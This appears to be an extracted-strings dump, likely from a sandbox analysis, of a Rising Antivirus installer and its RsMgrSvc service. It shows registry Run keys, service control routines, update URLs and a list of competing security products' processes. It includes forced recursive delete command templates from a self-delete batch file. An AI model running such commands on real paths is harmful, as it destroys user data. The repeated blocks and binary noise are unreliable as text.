GetAclInformation() failed. Error %d
GetSecurityDescriptorDacl() failed. Error %d
InitializeSecurityDescriptor() failed.Error %d
GetFileSecurity() failed. Error %d
InitializeSid() failed. Error %d
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
<!--%s-->
WinSessionThread GetPidByName dwPID = %d , name=%s!
WTSQueryUserToken Failed! Err Code: %d
OpenProcess Failed! Err Code: %d
GetProcAddress(OpenProcessToken) Failed! Err Code: %d
OpenProcessToken Failed! Err Code: %d
GetLogonUserToken(%d)
CreateProcess2 Return: %d
LoadLibrary Failed! Err Code: %d
CreateEnvironmentBlock Failed! Err Code: %d
DuplicateTokenEx Failed! Err Code: %d
CreateProcessWithTokenW Failed! Err Code: %d
Userenv.DLL
GetFileAttributes %s return: %d
Delete File %s fail, Err: %d
Wow64DisableWow64FsRedirection Return: %d
Wow64RevertWow64FsRedirection Return: %d
RsInstallService(%s) Return: %d
ChangeServiceConfig Failed! Err Code: %d
CreateService Failed! Err Code: %d
OpenSCManager Failed! Err Code: %d
RsInstallService(%s)
RsUninstallService(%s) Return: %d
DeleteService Failed! Err Code: %d
OpenService Failed And Service Already Exist! Err Code: %d
RsUninstallService(%s)
OpenService Failed! Err Code: %d
LoadLibrary(Advapi32.dll) Failed!
RsSetServiceFailureAction(%s) Return: %d
GetProcAddress(%s) Failed!
ChangeServiceConfig2 Failed! Err Code: %d
RsSetServiceFailureAction(%s)
QueryServiceStatus Failed! Err Code: %d
StartService Failed! Err Code: %d
RsStartService(%s)
Wait for Service %s Time Out!
QueryServiceStatus(%s) Failed! Err Code: %d
ControlService(%s) SERVICE_CONTROL_STOP Failed! Err Code: %d
HeapAlloc Failed! Err Code: %d
EnumDependentServices Failed! Err Code: %d
Stop Service %s Dependencies...
%s's Stop is Pending...
Service %s is Stopped...
OpenService(%s) Failed! Err Code: %d
RsStopService(%s)
Rs%sInstallCom(%s) Return: %d
LoadLibrary(%s) Failed!
%s Failed! ErrMsg: %s
Rs%sInstallCom(%s)...
WinSessionThread CreateProcess ret = %d end !
WinSessionThread CreateProcess pid = %d, CreateProcessAsUser err = %d !
WinSessionThread CreateProcess begin dwSessionID = %d!
WININIT.INI
\WININIT.INI
HKEY_CURRENT_CONFIG
"%s" %s
\RsMgrSvc.ini
Save DELETEPATH %s to RsMgrSvc.ini
Save REBOOTRUN %s to RsMgrSvc.ini
%s Loaded By %s
EXPLORER.EXE
Setup.exe Begin----------------------------------
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
StopComponent(%s)...
StartComponent(%s)...
Report Error!
Call Component %s Dll_PreHandle Return: 0xX
Call Component %s Dll_PostHandle Return: 0xX
Check XML File %s Failed
Check File %s Failed
BackUp XML File From: %s To %s
Delete XML File: %s
Copy XML File From: %s To %s
%s\RsMgrsvc.ini
URLInfoAbout
hXXp://help.ikaka.com/
"%s" /UNINSTALL /PRODUCT=%s
"%s" /UNINSTALL /PRODUCT=RSD
Delete File %s
Copy File From %s To %s
CompsVer.inf
Copy Path From %s To %s
Down Load %s To Path: %s
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\currentversion\run
RunFirstInstall Successfully...NeedReboot: %d
InstallComponentList Failed! Error Code: 0xX
PreHandleComponentList Failed! Error Code: 0xX
Product_PreHandle Failed! Error Code: 0xX
BackUpComponentList Failed! Error Code: 0xX
CheckComponentList Failed! Error Code: 0xX
RunFirstInstall, AfterReboot: %d
RavTmp: %s
file not exist : %s
succeed to download %s
Failed to download %s. ErrCode = %d; hr = %d
Failed to verify %s
%s%s/%s%s.inf
Failed to get download url from %s
URLLIST
Failed to load %s.
%s%s/%s/%s/%s
%s\%s\%s\%s
%s%s/%s/%s
%s\%s\%s
Failed to get %s-ITEM.
Failed to get %s-FILES.
Failed to get %s-COMPONENT.
Download %s retry > 3
%s/%s/%s_xml.zip
%s\%s\%s.xml
%s%s/%s/%s.xml
Failed to get %s' newver from %s
SCMD
REGVERKEY
REGKEYVALUE
REGKEYNAME
REGKEY
Set File %s Everyone Access Rights 0xX return: %d
Set File %s Users Access Rights 0xX return: %d
Delete File Return: %d, NeedReboot: %d
Prepare To Delete File %s...
Back Up File From: %s To: %s Return: %d
Skip Backing Up File %s For Checked OK...
Copy File Return: %d, NeedReboot: %d
MoveFile From %s To %s
Prepare To Copy File From %s To %s...
TaskbarPin = 0x%x
Install Link: %s
Delete Link: %s
TaskbarunPin = 0x%x
Old Link File: %s
SUBKEY
Set Key %s Everyone Access Rights 0xX return: %d
Set Key %s Users Access Rights 0xX return: %d
REGKEYDATATYPE
Install Key KeyName: %s, ValueName: %s, Value: %s, DataType: %d Return: %d
Backup Key Value Return: %d
microsoft\windows\currentversion\run
Restore Key Value Return: %d
UnInstall Key KeyName: %s, ValueName: %s Return: %d
Execute langsel.exe
langsel.exe
Setup Log (*.log)
*.log
A%d M
ÚTADIR%
Need Reboot, Add DeletePath Task To Server: %s
No Reboot, RsDeletePath(%s)
\lics%d.txt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
{X-X-X-XX-XXXXXX}.bmp
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SHFolder.dll
Shell32.dll
HKEY_LOCAL_MACHINE\%s\%s
%snserver.exe
%sRsTest.ini
Software\Microsoft\Windows\CurrentVersion
nserver.exe
%FIRSTPART%
%COMMONDIR%
%DOMINODATA%
%DOMINODIR%
%SYSDIR64%
%SYSDIR%
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
[INF]CRsConfigBase::InitializeRsConfig: GetPath(PathSize=%d),Result=0xX
[ERR]CRsConfigBase::InitializeRsConfig: QueryInterface RSIID_IRSCfgMgr Failed(Result=0xX)!
[ERR]CRsConfigBase::InitializeRsConfig:CreateAppEnv Failed(Result=0xX).
RsConfig.cfg
[ERR]CRsConfigBase::InitializeRsConfig:QueryInterface RSIID_IRSAppMgr failed(Result=0xX).
[ERR]CRsConfigBase::InitializeRsConfig:CreateObject RSID_RSAppMgr failed(Result=0xX).
RSAPPMGR.DLL
\RSAPPMGR.DLL
comx3.dll
</%s>
standalone="%s"
encoding="%s"
version="%s"
&#xX;
%s='%s'
%s="%s"
\RsLang.dll
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
System\CurrentControlSet\Services\VxD\MSTCP
255.255.255.255
socket() failed; %d
Range: bytes=%d-
hXXp://
portuguese-brazilian
.rstmp
1.1.3
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
C:\DistributedAutoLink\Temp\CompileOutputDir\Setup.pdb
GetProcessHeap
SetNamedPipeHandleState
WaitNamedPipeA
GetWindowsDirectoryA
KERNEL32.dll
MsgWaitForMultipleObjects
ExitWindowsEx
EnumWindows
EnumChildWindows
USER32.dll
comdlg32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyA
RegOpenKeyA
RegCreateKeyExA
RegDeleteKeyA
RegSetKeySecurity
RegGetKeySecurity
RegQueryInfoKeyA
RegEnumKeyExA
ADVAPI32.dll
ShellExecuteExA
ShellExecuteA
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
RPCRT4.dll
InternetCrackUrlA
HttpQueryInfoA
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
VERSION.dll
WSOCK32.dll
GetCPInfo
11166666600000000000000/////////.....""""""""""""""""--- .DDDDDDDDDDDDDDDDDDDDDDDDDDBBBBBB
>VVVVVVVVVVVVYYYY:Y:YYV8888888888888.ppMs3llkxNqKKqK
!'!555''''
!! **""!
#### # # # #  # # # #
6,,,6,,6,66
,,,,66,,6,
6,,,,6,,,
555555555555555
666666666666666666
888888888
CC.CCCCCC6hML7L77L789;nOOOOOOOO8
...CCCCCC6hMLL7777789;
...CCCCCC6hML77777789;
"""!"!"!"
1111111111111000000
!%%&11&&&
23333333333333333333
3333343333333333334
443434333333333333
#34344443344333343
3444444444444
444444444444
7676676676676676
7777777777777
77777777777
>889889889889883$3
/2$ÝDD
4::-...,..,,,, %
7766666666666666666666601$ÞDE
000000000000011110
"#%DPTVVVVVVPO%%"L
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel
6'6.6>6>7
2<3t3
9#939:9[9
; ;$;(;,;0;4;8;<;
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
)rackUrl3&
4{Z'rS%sT%sT%sT%sT$rR#sR"mN
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<!--The ID below indicates application support for Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!--The ID below indicates application support for Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!--The ID below indicates application support for Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
It is strongly recommended to close all Windows program before running the setup program.
Password:
This module need %fM
1.0.0.2
Setup.EXE
20140619153336140
ECan't create the destination folder, please check and input it again.APlease take off your CD avoiding to restart from CDROM next time.
 Totally scaned %d files, found %d viruses.
Export,Unable to Create File Folder: %s , continue?
This version [version:%s] is older than your current installed [version:%s]
Continue to install Rising AntiVirus Software[version:%s]?
%Click "Next" to continue installation
jSystem comctl32.dll version is lower than 4.70!\please upgrade it through installing IE4 or above version.
KYou have install follow Rising product, this product can't install whit it.FLast Rising setup progress is not completed, please reboot your systemNRising Anti-virus software has been uninstalled successfully but follow files.
!Version: %s Update Date: %s
$Add or remove same component please!(%d second left to auto close this dialog8Rising Anti-virus software has been updated successfully
Password is error7update is completed, windows need reboot for copy file.

install1393485.exe_1148_rwx_00401000_001FC000:

\rsdebug.ini
c:\%s
dbghelp.dll
kernel32.dll
d-d-d(d-d-d)
Kernel32.dll
\rsmain.exe
[d-d-d][d:d:d:d]
%s\%s
%s\*.*
C:\Temp
SOFTWARE\Rising\%s
2.log
[u]
[0xX]
RAV.INI
\Rs7zSfx.log
\setup.dll
CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}
%s\CompsVer.inf
Setup.exe
%s\auto.ini
@Sleep...%d
%s Start
%s End
{E5C53971-D80E-4500-BE0D-761BF3CD8457}
Unsupported Method
Password is not defined
mscoree.dll
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
GetProcessWindowStation
user32.dll
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
CLSID\{CAA2D3B2-4BB5-4a45-A17A-122773379D99}
XXXXXXXXXXX
{X-X-X-XX-XXXXXX}
\NetConfig.ini
{"vkey": "%s", "guid": "%s", "sguid": "%s", "actionid": "%s", "tag": "%s","step": "%s",
"result": "%s", "errorcode": "%s", "remark": "%s", "pa": "%s", "pb": "%s"}
Label.dat
hXXp://center.rising.com.cn/urg.asp?v=%s&t=%s&a=%s
%sbase
Iphlpapi.dll
\\.\PhysicalDrive%d
\\.\Scsi%d:
MSIE %d.%d
WININET.DLL
Windows
Windows Me
Windows 98
Windows 95
Windows NT %d.%d
%s:%d
Mozilla/4.0 (compatible; %s; %s; Rising)
Content-Type: application/x-www-form-urlencoded
HTTP/1.0
C:\DistributedAutoLink\Temp\CompileOutputDir\7zSfx.pdb
COMCTL32.dll
GDI32.dll
restorelog.txt
zcÁ
T3%dU
K.ZuNN
)$OI%f
B.Yo@
26.Ip
up.yF
~mM.Bv
qPndR.Ts
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
.Class 3 Public Primary Certification Authority0
<VeriSign Class 3 Public Primary Certification Authority - G50
hXXp://crl.verisign.com/pca3.crl0
hXXps://VVV.verisign.com/cps0
#hXXp://logo.verisign.com/vslogo.gif04
hXXp://ocsp.verisign.com0>
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
hXXp://sf.symcb.com/sf.crl0f
hXXps://d.symcb.com/cps0%
hXXps://d.symcb.com/rpa0
hXXp://sf.symcd.com0&
hXXp://sf.symcb.com/sf.crt0
hXXps://VVV.verisign.com/cps0*
hXXps://VVV.verisign.com/rpa0
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
z.oao
].XcG
~jq.wz
.FDF`O
;.bd/
:U%SN
ej.CC
`X.UT?.
.lqwD
*e_!.sWI$`
]>!.gB
k.Rrt
TCP_yy
%S5]*
.fb#c$Z4
h[%D}_
$T.Ia
V.jurV
Sù,
T%xYS3
9kl.Uw
We]%F
u.zQ0
4\ R%d
.qJ4C9.
[email protected]
 y.Di
vJY.lNk'1
.Gi#O$@$
~D.Hh
U.LZe
yo.NRL;
.npr =
y/"Z.Jn(
Diurl
A.Ot=_d
.psd x
}.eNk^6E
@%X;g
~gq%c^
;.Aum
_6}"%_^&
36.hU
S}i;%u
$.dls
iY.Ub
%cUNX<
EHJJGA[.Oj
S.lW"
.hw1.
.CB5t
.MAF!
|%X3j
.aRSr
".xNT
3.Mh)
X2.Wq
B%.GMK
8&H8.VW
a%s%s
.dk:8e`
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\RsdSfxTmp
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe
.text
`.rdata
@.data
.rsrc
@.reloc
QSVSSSh
>%uPV
|$D.tD
.tgPV
FTPjK
FtPj;
C.PjRVj
u.VV3
|$$vL9|$ u%Sh
Advapi32.dll
Explorer.exe
NtDll.dll
%d %d %d %d
Failed to call WTSQueryUserToken, err= 0x%x
wtsapi32.DLL
Could not open pipe
SetNamedPipeHandleState failed
\\.\pipe\RISING_RSD_BU
%*.*f
/RUNAS %s
Failed to load psapi.dll.
Psapi.dll
Setup.exe End with ErrorCode: 0xX
hXXp://center.rising.com.cn/LogCenter.asp?info=%s
Key=%s&v1=%s&v2=%s&v3=%s&v4=%s&v5=%s
Password
Port
%s\Data\%s\%s.ini
setup.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
%s(%s)
ReportView
KERNEL32.DLL
SetWillReboot(%d)
Failed to call QueryServiceStatus(RSD)! Err Code: %d
Failed to call OpenService(RSD)! Err Code: %d
Failed to call OpenSCManager! Err Code: %d
\RsTest.ini
ÞSKTOP%
\label.dat
\Backup.ini
\Export.ini
\XMLS\RSSetup.xml
\Setup.exe
\*.exe
\XMLS\Setup.xml
\os.xml
/PASS=
/PRODUCT=%s
/LANG=%d
HKEY_LOCAL_MACHINE\SoftWare\Rising\%s
ITEM%d
UPDATEXMLURL
d-d-- d:d
Setup.dll
Local_RSD_Setup_%s
Global\Rising_RSD_Setup_%s
Rising_RSD_Setup_%s
\Backup\RSD\RSSetup\RSSetup.xml
\RSSetup.xml
\CompsVer.inf
AddPCAExclude return: %d
Open Key Failed!
Create Key Failed!
Query Value Failed! Return: %d
%s\Setup.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
AddPCAExclude(%d)
Setup.xml
\Setup.xml
12345678.000
Create Temp Cfg From %s to %s
rd /q %s
rd /s /q %s
if exist %s goto repeat
del /s /q /f %s
\DelSelf.bat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SetFileSecurity() failed. Error %d
SetSecurityDescriptorControl() failed.Error %d
GetSecurityDescriptorControl() failed.Error %d
SetSecurityDescriptorDacl() failed. Error %d
AddAce() failed. Error %d
GetAce() failed. Error %d
AddAccessAllowedAce() failed. Error %d
AddAccessAllowedAceEx() failed. Error %d
advapi32.dll
InitializeAcl() failed. Error %d
HeapAlloc() failed. Error %d
GetAclInformation() failed. Error %d
GetSecurityDescriptorDacl() failed. Error %d
InitializeSecurityDescriptor() failed.Error %d
GetFileSecurity() failed. Error %d
InitializeSid() failed. Error %d
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
<!--%s-->
WinSessionThread GetPidByName dwPID = %d , name=%s!
WTSQueryUserToken Failed! Err Code: %d
OpenProcess Failed! Err Code: %d
GetProcAddress(OpenProcessToken) Failed! Err Code: %d
OpenProcessToken Failed! Err Code: %d
GetLogonUserToken(%d)
CreateProcess2 Return: %d
LoadLibrary Failed! Err Code: %d
CreateEnvironmentBlock Failed! Err Code: %d
DuplicateTokenEx Failed! Err Code: %d
CreateProcessWithTokenW Failed! Err Code: %d
Userenv.DLL
GetFileAttributes %s return: %d
Delete File %s fail, Err: %d
Wow64DisableWow64FsRedirection Return: %d
Wow64RevertWow64FsRedirection Return: %d
RsInstallService(%s) Return: %d
ChangeServiceConfig Failed! Err Code: %d
CreateService Failed! Err Code: %d
OpenSCManager Failed! Err Code: %d
RsInstallService(%s)
RsUninstallService(%s) Return: %d
DeleteService Failed! Err Code: %d
OpenService Failed And Service Already Exist! Err Code: %d
RsUninstallService(%s)
OpenService Failed! Err Code: %d
LoadLibrary(Advapi32.dll) Failed!
RsSetServiceFailureAction(%s) Return: %d
GetProcAddress(%s) Failed!
ChangeServiceConfig2 Failed! Err Code: %d
RsSetServiceFailureAction(%s)
QueryServiceStatus Failed! Err Code: %d
StartService Failed! Err Code: %d
RsStartService(%s)
Wait for Service %s Time Out!
QueryServiceStatus(%s) Failed! Err Code: %d
ControlService(%s) SERVICE_CONTROL_STOP Failed! Err Code: %d
HeapAlloc Failed! Err Code: %d
EnumDependentServices Failed! Err Code: %d
Stop Service %s Dependencies...
%s's Stop is Pending...
Service %s is Stopped...
OpenService(%s) Failed! Err Code: %d
RsStopService(%s)
Rs%sInstallCom(%s) Return: %d
LoadLibrary(%s) Failed!
%s Failed! ErrMsg: %s
Rs%sInstallCom(%s)...
WinSessionThread CreateProcess ret = %d end !
WinSessionThread CreateProcess pid = %d, CreateProcessAsUser err = %d !
WinSessionThread CreateProcess begin dwSessionID = %d!
WININIT.INI
\WININIT.INI
HKEY_CURRENT_CONFIG
"%s" %s
\RsMgrSvc.ini
Save DELETEPATH %s to RsMgrSvc.ini
Save REBOOTRUN %s to RsMgrSvc.ini
%s Loaded By %s
EXPLORER.EXE
Setup.exe Begin----------------------------------
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
StopComponent(%s)...
StartComponent(%s)...
Report Error!
Call Component %s Dll_PreHandle Return: 0xX
Call Component %s Dll_PostHandle Return: 0xX
Check XML File %s Failed
Check File %s Failed
BackUp XML File From: %s To %s
Delete XML File: %s
Copy XML File From: %s To %s
%s\RsMgrsvc.ini
URLInfoAbout
hXXp://help.ikaka.com/
"%s" /UNINSTALL /PRODUCT=%s
"%s" /UNINSTALL /PRODUCT=RSD
Delete File %s
Copy File From %s To %s
CompsVer.inf
Copy Path From %s To %s
Down Load %s To Path: %s
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\currentversion\run
RunFirstInstall Successfully...NeedReboot: %d
InstallComponentList Failed! Error Code: 0xX
PreHandleComponentList Failed! Error Code: 0xX
Product_PreHandle Failed! Error Code: 0xX
BackUpComponentList Failed! Error Code: 0xX
CheckComponentList Failed! Error Code: 0xX
RunFirstInstall, AfterReboot: %d
RavTmp: %s
file not exist : %s
succeed to download %s
Failed to download %s. ErrCode = %d; hr = %d
Failed to verify %s
%s%s/%s%s.inf
Failed to get download url from %s
URLLIST
Failed to load %s.
%s%s/%s/%s/%s
%s\%s\%s\%s
%s%s/%s/%s
%s\%s\%s
Failed to get %s-ITEM.
Failed to get %s-FILES.
Failed to get %s-COMPONENT.
Download %s retry > 3
%s/%s/%s_xml.zip
%s\%s\%s.xml
%s%s/%s/%s.xml
Failed to get %s' newver from %s
SCMD
REGVERKEY
REGKEYVALUE
REGKEYNAME
REGKEY
Set File %s Everyone Access Rights 0xX return: %d
Set File %s Users Access Rights 0xX return: %d
Delete File Return: %d, NeedReboot: %d
Prepare To Delete File %s...
Back Up File From: %s To: %s Return: %d
Skip Backing Up File %s For Checked OK...
Copy File Return: %d, NeedReboot: %d
MoveFile From %s To %s
Prepare To Copy File From %s To %s...
TaskbarPin = 0x%x
Install Link: %s
Delete Link: %s
TaskbarunPin = 0x%x
Old Link File: %s
SUBKEY
Set Key %s Everyone Access Rights 0xX return: %d
Set Key %s Users Access Rights 0xX return: %d
REGKEYDATATYPE
Install Key KeyName: %s, ValueName: %s, Value: %s, DataType: %d Return: %d
Backup Key Value Return: %d
microsoft\windows\currentversion\run
Restore Key Value Return: %d
UnInstall Key KeyName: %s, ValueName: %s Return: %d
Execute langsel.exe
langsel.exe
Setup Log (*.log)
*.log
A%d M
ÚTADIR%
Need Reboot, Add DeletePath Task To Server: %s
No Reboot, RsDeletePath(%s)
\lics%d.txt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
{X-X-X-XX-XXXXXX}.bmp
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SHFolder.dll
Shell32.dll
HKEY_LOCAL_MACHINE\%s\%s
%snserver.exe
%sRsTest.ini
Software\Microsoft\Windows\CurrentVersion
nserver.exe
%FIRSTPART%
%COMMONDIR%
%DOMINODATA%
%DOMINODIR%
%SYSDIR64%
%SYSDIR%
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
[INF]CRsConfigBase::InitializeRsConfig: GetPath(PathSize=%d),Result=0xX
[ERR]CRsConfigBase::InitializeRsConfig: QueryInterface RSIID_IRSCfgMgr Failed(Result=0xX)!
[ERR]CRsConfigBase::InitializeRsConfig:CreateAppEnv Failed(Result=0xX).
RsConfig.cfg
[ERR]CRsConfigBase::InitializeRsConfig:QueryInterface RSIID_IRSAppMgr failed(Result=0xX).
[ERR]CRsConfigBase::InitializeRsConfig:CreateObject RSID_RSAppMgr failed(Result=0xX).
RSAPPMGR.DLL
\RSAPPMGR.DLL
comx3.dll
</%s>
standalone="%s"
encoding="%s"
version="%s"
&#xX;
%s='%s'
%s="%s"
\RsLang.dll
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
System\CurrentControlSet\Services\VxD\MSTCP
255.255.255.255
socket() failed; %d
Range: bytes=%d-
hXXp://
portuguese-brazilian
.rstmp
1.1.3
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
C:\DistributedAutoLink\Temp\CompileOutputDir\Setup.pdb
GetProcessHeap
SetNamedPipeHandleState
WaitNamedPipeA
GetWindowsDirectoryA
KERNEL32.dll
MsgWaitForMultipleObjects
ExitWindowsEx
EnumWindows
EnumChildWindows
USER32.dll
comdlg32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyA
RegOpenKeyA
RegCreateKeyExA
RegDeleteKeyA
RegSetKeySecurity
RegGetKeySecurity
RegQueryInfoKeyA
RegEnumKeyExA
ADVAPI32.dll
ShellExecuteExA
ShellExecuteA
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
RPCRT4.dll
InternetCrackUrlA
HttpQueryInfoA
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
VERSION.dll
WSOCK32.dll
GetCPInfo
11166666600000000000000/////////.....""""""""""""""""--- .DDDDDDDDDDDDDDDDDDDDDDDDDDBBBBBB
>VVVVVVVVVVVVYYYY:Y:YYV8888888888888.ppMs3llkxNqKKqK
!'!555''''
!! **""!
#### # # # #  # # # #
6,,,6,,6,66
,,,,66,,6,
6,,,,6,,,
555555555555555
666666666666666666
888888888
CC.CCCCCC6hML7L77L789;nOOOOOOOO8
...CCCCCC6hMLL7777789;
...CCCCCC6hML77777789;
"""!"!"!"
1111111111111000000
!%%&11&&&
23333333333333333333
3333343333333333334
443434333333333333
#34344443344333343
3444444444444
444444444444
7676676676676676
7777777777777
77777777777
>889889889889883$3
/2$ÝDD
4::-...,..,,,, %
7766666666666666666666601$ÞDE
000000000000011110
"#%DPTVVVVVVPO%%"L
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel
6'6.6>6>7
2<3t3
9#939:9[9
; ;$;(;,;0;4;8;<;
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
)rackUrl3&
It is strongly recommended to close all Windows program before running the setup program.
Password:
This module need %fM
1.0.0.2
Setup.EXE
20140619153336140
ECan't create the destination folder, please check and input it again.APlease take off your CD avoiding to restart from CDROM next time.
 Totally scaned %d files, found %d viruses.
Export,Unable to Create File Folder: %s , continue?
This version [version:%s] is older than your current installed [version:%s]
Continue to install Rising AntiVirus Software[version:%s]?
%Click "Next" to continue installation
jSystem comctl32.dll version is lower than 4.70!\please upgrade it through installing IE4 or above version.
KYou have install follow Rising product, this product can't install whit it.FLast Rising setup progress is not completed, please reboot your systemNRising Anti-virus software has been uninstalled successfully but follow files.
!Version: %s Update Date: %s
$Add or remove same component please!(%d second left to auto close this dialog8Rising Anti-virus software has been updated successfully
Password is error7update is completed, windows need reboot for copy file.

RsMgrSvc.exe_1936:

.text
`.rdata
@.data
.rsrc
t%ShH;B
|$D.tD
CryptDecodeObject failed with %x
wintrust.dll
WTHelperGetProvCertFromChain
CryptCATCatalogInfoFromContext
crypt32.dll
CryptMsgGetParam
CryptSIPVerifyIndirectData failed with %x
1.3.6.1.4.1.311.2.1.4
CryptMsgGetParam(%d) failed with %x
CryptSIPRetrieveSubjectGuid failed with %x
CryptQueryObject failed with %x
\\.\PhysicalDrive%d
\\.\Scsi%d:
Iphlpapi.dll
Software\Microsoft\Windows\CurrentVersion
Advapi32.dll
\Rising\RSD\RsMgrSvc.exe"
Explorer.exe
XXXXXXXXXXX
{X-X-X-XX-XXXXXX}
CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
[d-d-d][d:d:d:d]
SHFolder.dll
Shell32.dll
SOFTWARE\Rising\%s
2.log
[u]
[0xX]
RAV.INI
WinSessionThread GetPidByName dwPID = %d , name=%s!
NtDll.dll
Kernel32.dll
WTSQueryUserToken Failed! Err Code: %d
wtsapi32.DLL
OpenProcess Failed! Err Code: %d
GetProcAddress(OpenProcessToken) Failed! Err Code: %d
OpenProcessToken Failed! Err Code: %d
GetLogonUserToken(%d)
>`userinit.exe
CRsMgrSvc::WaitForLogonNT:LoadLibrary(_"psapi.dll");err=0x%x
psapi.dll
Fail to OpenProcessToken; 0x%x
Failed to call CreateProcessAsUser again: appname = %s cmd=%s;err=0x%x.
Failed to SetTokenInformation(0):err=0x%x
Failed to call CreateProcessAsUser:cmd=%s;err=0x%x.
Failed to DuplicateTokenEx:err=0x%x
Failed to SetTokenInformation:err=0x%x
SessionId = %d
Failed to LoadLibrary("Wtsapi32.dll"):err=0x
Failed to call WTSEnumerateSessions:err=0x%x
SessionInfo[%d]: SessionId=%d; WinStationName=%s; State=%d.
Wtsapi32.dll
Failed to CreateProcess:%s;err=0x%x
Failed to LoadLibrary("Wtsapi32.dll"):err=0x%x
Failed to WTSEnumerateSessions:err=0x%x
Session\%d\RSD_POP_MESSAGE_INFO
WinSessionThread CreateProcess ret = %d end !
WinSessionThread CreateProcess pid = %d, CreateProcessAsUser err = %d !
Userenv.DLL
WinSessionThread CreateProcess begin dwSessionID = %d!
Failed to LoadLibrary("Userenv.DLL"):err=0x%x
Failed to call CreateProcessAsUser: cmd=%s;err=0x%x.
New Failed to call WTSQueryUserToken, err= 0x%x
rsmsg
%s\rsmsginfo.ini
Failed to open the shell ready event: 0x%x
"%s" /shellrun
%s\RsStub.exe
Session\%d\ShellReadyEvent
LogonRun - session : %d
Failed to call RegOpenKeyEx, err = 0x%x
Failed to call RegSaveKey, err = 0x%x
Failed to call AdjustTokenPrivileges, err = 0x%x
Failed to call OpenPrcessToken, err = 0x%x
%s\RsMgrSvc.dat
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s
BaiduAnSvc.exe
BaiduSdSvc.exe
liebao.exe
ksafe.exe
{849B7E2B-0551-429C-B317-14B7D374D6EC}_is1
kxescore.exe
QQPCRtp.exe
360sd.exe
360se.exe
{23F3F476-BE34-4f48-9C77-2806A8393EC4}
360Desktop.exe
ZhuDongFangYu.exe
safeboxTray.exe
Failed to Create LogonRunThread Thread, err = 0x%x
SessionChange:EventType=%d; sessionID = %d
\Backup\RSD\RSSetup\RSSetup.xml
rsup10.rising.com.cn
u.suxiazai.com
%s?t=0&info=%s
ver=%s&guid=%s&sguid=%s&state=%s
hXXp://u.suxiazai.com/menu/info.xml
hXXp://rsup10.rising.com.cn/menu/info.xml
%srsd\info.xml
/subkey
Failed to Verify the "%s".
Failed to call vf.Init.
%s\rsbackup.exe
"%s\rsbackup.exe"
/subkey
%s\RsMgrSvc.ini
%s\updater.exe
"%s\updater.exe"
DeleteFile: %s.
ITEM%d
\RsMgrSvc.ini
DeletePath: %s.
Clean WillReboot In %s
%s\%s\%s.ini
1971-01-01 00:00:00
%d-%d-%d %d:%d:%d
%s\Data
%s /subkey %s /RsMgrSvc
"%s\Updater.exe" /silence
%s\Updater.exe
\Reboot.ini
